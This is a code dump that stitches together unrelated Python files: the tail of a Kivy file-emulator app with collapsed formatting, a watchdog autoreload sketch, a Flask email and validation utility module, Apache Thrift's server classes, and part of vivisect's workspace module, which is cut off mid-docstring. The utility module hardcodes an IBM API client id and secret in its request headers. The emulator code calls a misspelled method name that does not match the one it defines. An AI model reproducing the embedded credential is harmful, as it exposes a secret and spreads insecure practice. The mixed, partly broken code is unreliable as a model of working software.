""" if monotonic is None: Logger.exception("{}: Cannot use idle detector, monotonic is missing".format(self.appname)) self.idle_timer = None self.idle_timeout = timeout Clock.schedule_interval(self._check_idle, 1) self.root.bind( on_touch_down=self.rearm_idle, on_touch_up=self.rearm_idle) def _check_idle(self, *largs): if not hasattr(self, "idle_timer"): return if self.idle_timer is None: return if monotonic() - self.idle_timer > self.idle_timeout: self.idle_timer = None self.dispatch("on_idle") def rearm_idle(self, *largs): """ Rearm the idle timer """ if not hasattr(self, "idle_timer"): return if self.idle_timer is None: self.dispatch("on_wakeup") self.idle_timer = monotonic() def on_idle(self, *largs): """ Event fired when the application enter the idle mode """ pass def on_wakeup(self, *largs): """ Event fired when the application leaves idle mode """ pass # internals def patch_builder(self): Builder.orig_load_string = Builder.load_string Builder.load_string = self._builder_load_string def _builder_load_string(self, string, **kwargs): if "filename" not in kwargs: from inspect import getframeinfo, stack caller = getframeinfo(stack()[1][0]) kwargs["filename"] = caller.filename return Builder.orig_load_string(string, **kwargs) # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def watchdog_reloader(self,args): print("reloading begins ") # self.AUTORELOADER_PATHS = self.AUTORELOADER_PATHS self.enable_autoreload() self.patch_builder() def choose(self): filechooser.open_file(on_selection=self.handle_selection) def handle_selection(self, selection): self.selection = selection def on_selection(self, *a, **k): self.clear() def clear(self): try: print("clearing screen") self.root.ids.emulator_screen.clear_widgets() Window.borderless = True Clock.schedule_once(self.watchdog_reloader, 2) self.filename = str(self.selection[0]) base = "\\".join(self.filename.split("\\")[:-1]) print(base) self.AUTORELOADER_PATHS.clear() self.AUTORELOADER_PATHS.append((base, {"recursive": True})) history = JsonStore(history_path) if history.exists(self.filename): print("file already exists") else: print('creating a new file with json store') history.put(self.filename,file_name=self.filename) self.emulate_file(self.selection[0]) print(self.AUTORELOADER_PATHS) except: pass def build(self): return EmuInterface() def emulate_file(self, filename, threaded=False): root = None if not os.path.exists(filename): return dirname = os.path.dirname(filename) sys.path.append(dirname) os.chdir(dirname) resource_add_path(dirname) # self.root.ids.emulator_screen.clear_widgets() if threaded: Thread(target=partial(self.start_emulation, filename, threaded=threaded)).start() else: self.start_emulation(filename, threaded=threaded) def start_emulation(self, filename, threaded=False): print("___________________________________") print("Starting thread") root = None # print(os.path.splitext(filename)) if os.path.splitext(filename)[1] == '.kv': # load the kivy file directly try: # cahching error with kivy files Builder.unload_file(filename) # print("unloaded the kv") root = Builder.load_file(filename) except: traceback.print_exc() print("You kivy file has a problem") elif os.path.splitext(filename)[1] == '.py': print("its a py") self.load_defualt_kv(filename) try: # cahching error with python files root = self.load_py_file(filename) except: traceback.print_exc() print("You python file has a problem") if root: print("this is the root",root) if threaded: self.emulation_done(root, filename) else: print("not threaded") 
self.root.ids.emulator_screen.clear_widgets() self.root.ids.emulator_screen.add_widget(root) dirname = os.path.dirname(filename) sys.path.pop() resource_remove_path(dirname) @mainthread def emulation_done(self, root, filename): if root: self.root.ids.emulator_screen.add_widget(root) def load_default_kv(self, filename): app_cls_name = self.get_app_cls_name(filename) self.class_name = app_cls_name if app_cls_name is None: return kv_name = app_cls_name.lower() if app_cls_name.endswith('App'): kv_name = app_cls_name[:len(app_cls_name) - 3].lower() if app_cls_name: file_dir = os.path.dirname(filename) kv_filename = os.path.join(file_dir, kv_name + '.kv') print(kv_filename) if os.path.exists(kv_filename): try: # catching errors with kivy files Builder.unload_file(kv_filename) print("unloaded the kv file") # self.root.ids.emulator_screen.clear_widgets() print("clearing the emulator screen here") # self.root.ids.emulator_screen.clear_widgets() root = Builder.load_file(kv_filename) except Exception: traceback.print_exc() print("Your kivy file has a problem") def get_app_cls_name(self, filename): with open(filename) as fn: text = fn.read() lines = text.splitlines() app_cls = self.get_import_as('from kivy.app import App', lines) def check_app_cls(line): line = line.strip() return line.startswith('class') and line.endswith('(%s):' % app_cls) found = list(filter(check_app_cls, lines)) if found: line = found[0] cls_name = line.split('(')[0].split(' ')[1] return cls_name def get_root_from_runTouch(self, filename): with open(filename) as fn: text = fn.read() lines = text.splitlines() run_touch = self.get_import_as('from kivy.base import runTouchApp', lines) def check_run_touch(line): line = line.strip() return line.startswith('%s(' % run_touch) found = list(filter(check_run_touch, lines)) if found: line = found[0] root_name = line.strip().split('(')[1].split(')')[0] root_file = self.import_from_dir(filename) root = getattr(reload(root_file), root_name) return root def load_py_file(self, filename): app_cls_name = self.get_app_cls_name(filename) if app_cls_name: root_file = self.import_from_dir(filename) app_cls = getattr(reload(root_file), app_cls_name) root = app_cls().build() return root run_root = self.get_root_from_runTouch(filename) if run_root: return run_root def import_from_dir(self, filename): ''' force python to import this file from the project dir ''' dirname, file = os.path.split(filename) sys.path = [dirname] + sys.path import_word = os.path.splitext(file)[0] imported = __import__(import_word) return imported def get_import_as(self, start, lines): line = list(filter(lambda line: line.strip().startswith(start), lines)) if line: words = line[0].split(' ') import_word = words[len(words) - 1] return import_word else: return def callback_for_menu_items(self, *args): toast(args[0]) def show_example_bottom_sheet(self): from kivymd.bottomsheet import MDListBottomSheet if not self.bs_menu_1: self.bs_menu_1 = MDListBottomSheet() self.bs_menu_1.add_item( "Open File", lambda x: self.choose(), icon='file') self.bs_menu_1.add_item( "Open History Tab", lambda x: self.history_screen(), icon='history') self.bs_menu_1.add_item( "Close Emulator", lambda x: self.stop(), icon='window-close') self.bs_menu_1.open() def history_screen(self): print(self.filename) self.root.ids.emulator_screen.clear_widgets() self.root.ids.history_screen.clear_widgets() self.root.ids.screen_manager.current = "history_screen" if __name__ == '__main__': KivyEmu().run()
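# --- Example (new, not part of the emulator above): a minimal standalone sketch of
# the watchdog-based autoreload pattern KivyEmu uses in enable_autoreload(), with
# the Kivy Clock debouncing left out. `watch_and_reload` and `on_change` are
# illustrative names, not project APIs; the watchdog calls themselves are real.
import time
from fnmatch import fnmatch
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

IGNORE_PATTERNS = ["*.pyc", "*__pycache__*"]

def watch_and_reload(rootpath, on_change):
    handler = FileSystemEventHandler()

    def dispatch(event):
        # Skip compiled-file noise, mirroring AUTORELOADER_IGNORE_PATTERNS above.
        if any(fnmatch(event.src_path, pat) for pat in IGNORE_PATTERNS):
            return
        if event.src_path.endswith((".py", ".kv")):
            on_change(event.src_path)

    # Route every filesystem event through our callback, as KivyEmu does.
    handler.dispatch = dispatch
    observer = Observer()
    observer.schedule(handler, rootpath, recursive=True)
    observer.start()
    return observer

if __name__ == "__main__":
    obs = watch_and_reload(".", lambda path: print("changed:", path))
    try:
        while True:
            time.sleep(1)
    finally:
        obs.stop()
        obs.join()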
utility.py
import os
import json
import re
import http.client
import logging
from threading import Thread

from flask import render_template, current_app
from flask_mail import Message
from json2html import *

from . import mail
from . import watson_conversion, cloudant_nosql_db
from automation import requestsloader


def send_async_email(app, msg):
    with app.app_context():
        mail.send(msg)


def send_email(to, subject, confirm_link, template=None):
    app = current_app._get_current_object()
    msg = Message(subject, sender=app.config['MAIL_SENDER'], recipients=[to])
    # msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', confirm_link=confirm_link)
    thr = Thread(target=send_async_email, args=[app, msg])
    thr.start()
    return thr


def send_email_api(to, sender, subject, confirm_link):
    conn = http.client.HTTPSConnection("w3.api.ibm.com")
    payload = "{\"to\":[\"%s\"]," \
              "\"from\":\"%s\"," \
              "\"subject\":\"%s\"," \
              "\"body\":" \
              "\"Hi, <br> You are receiving an email to confirm the access request. The link is : <br> %s\"}" \
              % (to, sender, subject, confirm_link)
    headers = {
        'x-ibm-client-id': "352c77cc-68cc-4d73-a5e5-ef10866719ed",
        'x-ibm-client-secret': "I0qT0tJ3vE7vB7oS7eX1dM5sP0oY7rP1hW1sN3mE2yB2eX5uM1",
        'content-type': "application/json",
        'accept': "application/json"
    }
    conn.request("POST", "/common/run/email/sendmail", payload, headers)
    res = conn.getresponse()
    data = res.read()
    print(data.decode("utf-8"))


def get_approver(emailAddress):
    return emailAddress


def convert_2_html(excel_content):
    excel_json = json.dumps(excel_content)
    excel_html = json2html.convert(json=excel_json, table_attributes="id=\"table-7\"")
    return excel_html


def read_excel_with_emai(filename):
    rl = requestsloader.RequestsLoader()
    rl.load_workbook(filename)
    excel_content = rl.get_requests_str()
    email_addr = rl.get_email()
    return excel_content, email_addr


def read_excel(filename):
    rl = requestsloader.RequestsLoader()
    rl.load_workbook(filename)
    excel_content = rl.get_requests_str()
    return excel_content


def verify_template(excel_content):
    if excel_content[0].get('Select Report Level'):
        return True


def verify_email_format(addr):
    if not addr:
        return False
    RE_EMAIL = re.compile(r'^[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+){0,4}@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+){0,4}$')
    return RE_EMAIL.match(addr)


def verify_select_level(rpt_level, sel_cty_comp):
    RE_CTY_CODE = re.compile(r'.*\d{3}.*')
    print(rpt_level, sel_cty_comp)
    if rpt_level == 'Company Level' and not RE_CTY_CODE.search(sel_cty_comp):
        return False
    else:
        return True


def verify_date(start_date, end_date):
    RE_DATE = re.compile(r'\d{4}[-/]\d{2}[-/]\d{2}')
    if RE_DATE.match(start_date) and RE_DATE.match(end_date):
        return True


def verify_input(input_val):
    if not input_val:
        return False
    elif '\n' in input_val:
        return False
    return True


def convert_country(country):
    re_country = re.split(': ', country)
    return '{}'.format(re_country[1])


def convert_company(company):
    re_comp = re.split(': ', company)
    return '{}({})'.format(re_comp[1], re_comp[0])
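# --- Usage sketch (new, not part of the original module): the validators above are
# pure functions and can be exercised directly; the sample values are invented.
# Running this block requires the package imports at the top of the file to resolve.
if __name__ == '__main__':
    assert verify_email_format('user.name@company.com')
    assert not verify_email_format('not an email')
    assert verify_date('2020-01-31', '2020/02/28')   # both - and / separators are accepted
    assert verify_select_level('Company Level', 'CN: 123 Example Co.')  # has a 3-digit company code
    assert not verify_select_level('Company Level', 'CN: Example Co.')  # company code missing
    assert verify_input('one line') and not verify_input('two\nlines')
    print('validator checks passed')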
TServer.py
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # from six.moves import queue import logging import os import threading from thrift.protocol import TBinaryProtocol from thrift.transport import TTransport logger = logging.getLogger(__name__) class TServer(object): """Base interface for a seak.vassar_server.server, which must have a serve() method. Three constructors for all servers: 1) (processor, serverTransport) 2) (processor, serverTransport, transportFactory, protocolFactory) 3) (processor, serverTransport, inputTransportFactory, outputTransportFactory, inputProtocolFactory, outputProtocolFactory) """ def __init__(self, *args): if (len(args) == 2): self.__initArgs__(args[0], args[1], TTransport.TTransportFactoryBase(), TTransport.TTransportFactoryBase(), TBinaryProtocol.TBinaryProtocolFactory(), TBinaryProtocol.TBinaryProtocolFactory()) elif (len(args) == 4): self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3]) elif (len(args) == 6): self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5]) def __initArgs__(self, processor, serverTransport, inputTransportFactory, outputTransportFactory, inputProtocolFactory, outputProtocolFactory): self.processor = processor self.serverTransport = serverTransport self.inputTransportFactory = inputTransportFactory self.outputTransportFactory = outputTransportFactory self.inputProtocolFactory = inputProtocolFactory self.outputProtocolFactory = outputProtocolFactory def serve(self): pass class TSimpleServer(TServer): """Simple single-threaded seak.vassar_server.server that just pumps around one transport.""" def __init__(self, *args): TServer.__init__(self, *args) def serve(self): self.serverTransport.listen() while True: client = self.serverTransport.accept() if not client: continue itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) itrans.close() otrans.close() class TThreadedServer(TServer): """Threaded seak.vassar_server.server that spawns a new thread per each connection.""" def __init__(self, *args, **kwargs): TServer.__init__(self, *args) self.daemon = kwargs.get("daemon", False) def serve(self): self.serverTransport.listen() while True: try: client = self.serverTransport.accept() if not client: continue t = threading.Thread(target=self.handle, args=(client,)) t.setDaemon(self.daemon) t.start() except KeyboardInterrupt: raise except Exception as x: logger.exception(x) def handle(self, client): itrans = self.inputTransportFactory.getTransport(client) otrans = 
self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) itrans.close() otrans.close() class TThreadPoolServer(TServer): """Server with a fixed size pool of threads which service requests.""" def __init__(self, *args, **kwargs): TServer.__init__(self, *args) self.clients = queue.Queue() self.threads = 10 self.daemon = kwargs.get("daemon", False) def setNumThreads(self, num): """Set the number of worker threads that should be created""" self.threads = num def serveThread(self): """Loop around getting clients from the shared queue and process them.""" while True: try: client = self.clients.get() self.serveClient(client) except Exception as x: logger.exception(x) def serveClient(self, client): """Process input/output from a client for as long as possible""" itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) itrans.close() otrans.close() def serve(self): """Start a fixed number of worker threads and put client into a queue""" for i in range(self.threads): try: t = threading.Thread(target=self.serveThread) t.setDaemon(self.daemon) t.start() except Exception as x: logger.exception(x) # Pump the socket for clients self.serverTransport.listen() while True: try: client = self.serverTransport.accept() if not client: continue self.clients.put(client) except Exception as x: logger.exception(x) class TForkingServer(TServer): """A Thrift seak.vassar_server.server that forks a new process for each request This is more scalable than the threaded seak.vassar_server.server as it does not cause GIL contention. Note that this has different semantics from the threading seak.vassar_server.server. Specifically, updates to shared variables will no longer be shared. It will also not work on windows. This code is heavily inspired by SocketServer.ForkingMixIn in the Python stdlib. 
""" def __init__(self, *args): TServer.__init__(self, *args) self.children = [] def serve(self): def try_close(file): try: file.close() except IOError as e: logger.warning(e, exc_info=True) self.serverTransport.listen() while True: client = self.serverTransport.accept() if not client: continue try: pid = os.fork() if pid: # parent # add before collect, otherwise you race w/ waitpid self.children.append(pid) self.collect_children() # Parent must close socket or the connection may not get # closed promptly itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) try_close(itrans) try_close(otrans) else: itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) oprot = self.outputProtocolFactory.getProtocol(otrans) ecode = 0 try: try: while True: self.processor.process(iprot, oprot) except TTransport.TTransportException: pass except Exception as e: logger.exception(e) ecode = 1 finally: try_close(itrans) try_close(otrans) os._exit(ecode) except TTransport.TTransportException: pass except Exception as x: logger.exception(x) def collect_children(self): while self.children: try: pid, status = os.waitpid(0, os.WNOHANG) except os.error: pid = None if pid: self.children.remove(pid) else: break
__init__.py
""" Yay! It's NOT IDA!!!1!!1!one! """ import os import re import sys import time import string import hashlib import logging import binascii import itertools import traceback import threading import contextlib import collections try: import Queue except ModuleNotFoundError: import queue as Queue # The envi imports... import envi import envi.bits as e_bits import envi.memory as e_mem import envi.common as e_common import envi.config as e_config import envi.bytesig as e_bytesig import envi.symstore.resolver as e_resolv import envi.symstore.symcache as e_symcache import vstruct import vstruct.cparse as vs_cparse import vstruct.primitives as vs_prims import vivisect.base as viv_base import vivisect.parsers as viv_parsers import vivisect.codegraph as viv_codegraph import vivisect.impemu.lookup as viv_imp_lookup from vivisect.exc import * from vivisect.const import * from vivisect.defconfig import * import vivisect.analysis.generic.emucode as v_emucode logger = logging.getLogger(__name__) STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER) def guid(size=16): return binascii.hexlify(os.urandom(size)) class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore): ''' VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace as their first parameter, and the workspace is responsible for all the user facing functions of getters/adders, running analysis passes, making the various locations, loading files, and more. Current keyword arguments: * confdir: * Type: String (path to directory) * Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory * Default: $HOME/.viv/ * autosave (boolean): * Type: Boolean * Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them. * Default: False ''' def __init__(self, **kwargs): e_mem.MemoryObject.__init__(self) viv_base.VivWorkspaceCore.__init__(self) autosave = kwargs.get('autosave', False) cfgdir = kwargs.get('confdir', None) if cfgdir: self.vivhome = os.path.abspath(cfgdir) else: self.vivhome = e_config.gethomedir(".viv", makedir=autosave) self._viv_gui = None # If a gui is running, he will put a ref here... self.saved = True # TODO: where is this used? self.rchan = None self.server = None self.chanids = itertools.count() self.arch = None # The placeholder for the Envi architecture module self.psize = None # Used so much, optimization is appropriate cfgpath = os.path.join(self.vivhome, 'viv.json') self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave) # Ideally, *none* of these are modified except by _handleFOO funcs... self.segments = [] self.exports = [] self.imports = [] self.codeblocks = [] self.relocations = [] self._dead_data = [] self.iscode = {} self.xrefs = [] self.xrefs_by_to = {} self.xrefs_by_from = {} # XXX - make config option self.greedycode = 0 self.metadata = {} self.comments = {} # Comment by VA. 
self.symhints = {} self.filemeta = {} # Metadata Dicts stored by filename self.transmeta = {} # Metadata that is *not* saved/evented self.cfctx = viv_base.VivCodeFlowContext(self) self.va_by_name = {} self.name_by_va = {} self.codeblocks_by_funcva = {} self.exports_by_va = {} self.colormaps = {} self.vasetdefs = {} self.vasets = {} self.reloc_by_va = {} self.func_args = {} self.funcmeta = {} # Function metadata stored in the workspace self.frefs = {} # Extended analysis modules self.amods = {} self.amodlist = [] # Extended *function* analysis modules self.fmods = {} self.fmodlist = [] self.chan_lookup = {} self.nextchanid = 1 self._cached_emus = {} # The function entry signature decision tree # FIXME add to export self.sigtree = e_bytesig.SignatureTree() self.siglist = [] self._initEventHandlers() # Some core meta types that exist self.setMeta('NoReturnApis', {}) self.setMeta('SymbolikImportEmulation', None) # Default to basic file storage self.setMeta("StorageModule", "vivisect.storage.basicfile") # There are a few default va sets for use in analysis self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),)) self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),)) self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING))) self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING))) self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER))) self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER))) self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), )) self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX))) self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),)) self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),)) def vprint(self, msg): logger.info(msg) def getVivGui(self): ''' Return a reference to the vivisect GUI object for this workspace. If the GUI is not running (aka, the workspace is being used programatically) this routine returns None. Example: vwgui = vw.getVivGui() if vwgui: vwgui.doStuffAndThings() ''' return self._viv_gui def getVivGuid(self): ''' Return the GUID for this workspace. Every newly created VivWorkspace should have a unique GUID, for identifying a particular workspace for a given binary/process-space versus another created at a different time. Filesystem-copies of the same workspace will have the same GUID by design. This easily allows for workspace-specific GUI layouts as well as comparisons of Server-based workspaces to the original file- based workspace used to store to the server. ''' vivGuid = self.getMeta('GUID') if vivGuid is None: vivGuid = guid() self.setMeta('GUID', vivGuid) return vivGuid def loadWorkspace(self, wsname): mname = self.getMeta("StorageModule") mod = self.loadModule(mname) mod.loadWorkspace(self, wsname) self.setMeta("StorageName", wsname) # The event list thusfar came *only* from the load... self._createSaveMark() # Snapin our analysis modules self._snapInAnalysisModules() def addFref(self, fva, va, idx, val): """ Add a reference from the operand at virtual address 'va' index 'idx' to a function local offset. Positive values (beginning with 0) are considered argument references. Negative values are considered function local storage and are relative to the stack pointer at function entry. 
""" # FIXME this should probably be an argument r = (va, idx, val) self._fireEvent(VWE_ADDFREF, r) def getFref(self, va, idx): """ Get back the fref value (or None) for the given operand index from the instruction at va. """ return self.frefs.get((va, idx)) def getEmulator(self, logwrite=False, logread=False): """ Get an instance of a WorkspaceEmulator for this workspace. Use logread/logwrite to enable memory access tracking. """ plat = self.getMeta('Platform') arch = self.getMeta('Architecture') eclass = viv_imp_lookup.workspace_emus.get((plat, arch)) if eclass is None: eclass = viv_imp_lookup.workspace_emus.get(arch) if eclass is None: raise Exception("WorkspaceEmulation not supported on %s yet!" % arch) emu = eclass(self, logwrite=logwrite, logread=logread) emu.setEndian(self.getEndian()) return emu def getCachedEmu(self, emuname): """ Get a cached emulator by name. If one doesn't exist it is created and then cached. """ emu = self._cached_emus.get(emuname) if emu is None: emu = self.getEmulator() self._cached_emus[emuname] = emu return emu def addLibraryDependancy(self, libname): """ Add a *normalized* library name to the import search chain for this binary. This is only needed for formats whose imports don't explicitly state their library name. """ # FIXME this needs to be event enabled... either plumb it special, # or allow the get/append/set race... dl = self.getMeta("DepLibs", None) if dl is None: dl = [] dl.append(libname) self.setMeta("DepLibs", dl) def getLibraryDependancies(self): ''' Retrieve the list of *normalized* library dependancies. ''' dl = self.getMeta("DepLibs", None) if dl is None: return [] return list(dl) def setComment(self, va, comment, check=False): ''' Set the humon readable comment for a given virtual. Comments will be displayed by the code renderer, and are an important part of this balanced breakfast. Example: vw.setComment(callva, "This actually calls FOO...") ''' if check and self.comments.get(va): return self._fireEvent(VWE_COMMENT, (va, comment)) def getComment(self, va): ''' Returns the comment string (or None) for a given virtual address. Example: cmnt = vw.getComment(va) print('COMMENT: %s' % cmnt) ''' return self.comments.get(va) def getComments(self): ''' Retrieve all the comments in the viv workspace as (va, cmnt) tuples. Example: for va,cmnt in vw.getComments(): print('Comment at 0x%.8x: %s' % (va, cmnt)) ''' return self.comments.items() def addRelocation(self, va, rtype, data=None): """ Add a relocation entry for tracking. Expects data to have whatever is necessary for the reloc type. eg. addend """ # split "current" va into fname and offset. future relocations will want to base all va's from an image base mmva, mmsz, mmperm, fname = self.getMemoryMap(va) # FIXME: getFileByVa does not obey file defs imgbase = self.getFileMeta(fname, 'imagebase') offset = va - imgbase self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data)) def getRelocations(self): """ Get the current list of relocation entries. """ return self.relocations def getRelocation(self, va): """ Return the type of relocation at the specified VA or None if there isn't a relocation entry for the address. """ return self.reloc_by_va.get(va) def pointerString(self, va): return self.arch.pointerString(va) def getAnalysisModuleNames(self): return list(self.amodlist) def getFuncAnalysisModuleNames(self): return list(self.fmodlist) def addFunctionSignatureBytes(self, bytez, mask=None): """ Add a function signature entry by bytes. 
This is mostly used by file parsers/loaders to manually tell the workspace about known entry signature types. see envi.bytesig for details. """ self.sigtree.addSignature(bytez, mask) self.siglist.append((bytez, mask)) def isFunctionSignature(self, va): """ Check if the specified va is a function entry signature according to the current entry point signature tree... """ if not self.isValidPointer(va): return False offset, bytes = self.getByteDef(va) return self.sigtree.isSignature(bytes, offset=offset) def addNoReturnApi(self, funcname): """ Inform vivisect code-flow disassembly that any call target which matches the specified name ("funcname" or "libname.funcname" for imports) does *not* exit and code-flow should be stopped... """ funcname = funcname.lower() m = self.getMeta('NoReturnApis', {}) m[funcname] = True self.setMeta('NoReturnApis', m) noretva = self.getMeta('NoReturnApisVa', {}) # If we already have an import entry, we need to update codeflow for lva, lsize, ltype, linfo in self.getImports(): if linfo.lower() != funcname: continue self.cfctx.addNoReturnAddr(lva) noretva[lva] = True self.setMeta('NoReturnApisVa', noretva) def addNoReturnApiRegex(self, funcre): ''' Inform vivisect code-flow disassembly that any call target which matches the specified regex ("funcname" or "libname.funcname" for imports) does *not* exit and code-flow should be stopped... ''' c = re.compile(funcre, re.IGNORECASE) m = self.getMeta('NoReturnApisRegex', []) m.append(funcre) self.setMeta('NoReturnApisRegex', m) for lva, lsize, ltype, linfo in self.getImports(): if c.match(linfo): self.addNoReturnApi(linfo) def isNoReturnVa(self, va): ''' Check if a VA is a no return API ''' return self.getMeta('NoReturnApisVa', {}).get(va, False) def checkNoRetApi(self, apiname, va): ''' Called as new APIs (thunks) are discovered, checks to see if they wrap a NoReturnApi. Updates if it is a no ret API thunk ''' noretva = self.getMeta('NoReturnApisVa', {}) for funcre in self.getMeta('NoReturnApisRegex', []): c = re.compile(funcre, re.IGNORECASE) if c.match(apiname): self.cfctx.addNoReturnAddr(va) noretva[va] = True for funcname in self.getMeta('NoReturnApis', {}).keys(): if funcname.lower() == apiname.lower(): self.cfctx.addNoReturnAddr(va) noretva[va] = True self.setMeta('NoReturnApisVa', noretva) def addAnalysisModule(self, modname): """ Add an analysis module by python import path """ if modname in self.amods: return mod = self.loadModule(modname) self.amods[modname] = mod self.amodlist.append(modname) logger.debug('Adding Analysis Module: %s', modname) def delAnalysisModule(self, modname): """ Remove an analysis module from the list used during analysis() """ if modname not in self.amods: raise Exception("Unknown Module in delAnalysisModule: %s" % modname) x = self.amods.pop(modname, None) if x is not None: self.amodlist.remove(modname) def loadModule(self, modname): __import__(modname) return sys.modules[modname] def addFuncAnalysisModule(self, modname): """ Snap in a per-function analysis module (by name) which will be triggered during the creation of a new function (makeFunction). """ if modname in self.fmods: return mod = self.loadModule(modname) self.fmods[modname] = mod self.fmodlist.append(modname) logger.debug('Adding Function Analysis Module: %s', modname) def delFuncAnalysisModule(self, modname): ''' Remove a currently registered function analysis module. 
Example: vw.delFuncAnalysisModule('mypkg.mymod') ''' x = self.fmods.pop(modname, None) if x is None: raise Exception("Unknown Module in delAnalysisModule: %s" % modname) self.fmodlist.remove(modname) def createEventChannel(self): chanid = self.chanids.next() self.chan_lookup[chanid] = Queue.Queue() return chanid def importWorkspace(self, wsevents): """ Import and initialize data from the given vivisect workspace export. """ # During import, if we have a server, be sure not to notify # the server about the events he just gave us... local = False if self.server is not None: local = True # Process the events from the import data... fe = self._fireEvent for event, einfo in wsevents: fe(event, einfo, local=local) return def exportWorkspace(self): ''' Return the (probably big) list of events which define this workspace. ''' return self._event_list def exportWorkspaceChanges(self): ''' Export the list of events which have been applied to the workspace since the last save. ''' return self._event_list[self._event_saved:] def initWorkspaceClient(self, remotevw): """ Initialize this workspace as a workspace client to the given (potentially cobra remote) workspace object. """ uname = e_config.getusername() self.server = remotevw self.rchan = remotevw.createEventChannel() self.server.vprint('%s connecting...' % uname) wsevents = self.server.exportWorkspace() self.importWorkspace(wsevents) self.server.vprint('%s connection complete!' % uname) thr = threading.Thread(target=self._clientThread) thr.setDaemon(True) thr.start() def _clientThread(self): """ The thread that monitors events on a server to stay in sync. """ if self.server is None: raise Exception("_clientThread() with no server?!?!") while self.server is not None: event, einfo = self.server.waitForEvent(self.rchan) self._fireEvent(event, einfo, local=True) def waitForEvent(self, chanid, timeout=None): """ Return an event,eventinfo tuple. """ q = self.chan_lookup.get(chanid) if q is None: raise Exception("Invalid Channel") return q.get(timeout=timeout) def deleteEventChannel(self, chanid): """ Remove a previously allocated event channel from the workspace. """ self.chan_lookup.pop(chanid) def reprPointer(vw, va): """ Do your best to create a humon readable name for the value of this pointer. note: This differs from parent function from envi.cli: * Locations database is checked * Strings are returned, not named (partially) * <function> + 0x<offset> is returned if inside a function * <filename> + 0x<offset> is returned instead of loc_##### """ if va == 0: return "NULL" loc = vw.getLocation(va) if loc is not None: locva, locsz, lt, ltinfo = loc if lt in (LOC_STRING, LOC_UNI): return vw.reprVa(locva) mbase, msize, mperm, mfile = vw.getMemoryMap(va) ret = mfile + " + 0x%x" % (va - mbase) sym = vw.getName(va, smart=True) if sym is not None: ret = sym return ret def reprVa(self, va): """ A quick way for scripts to get a string for a given virtual address. 
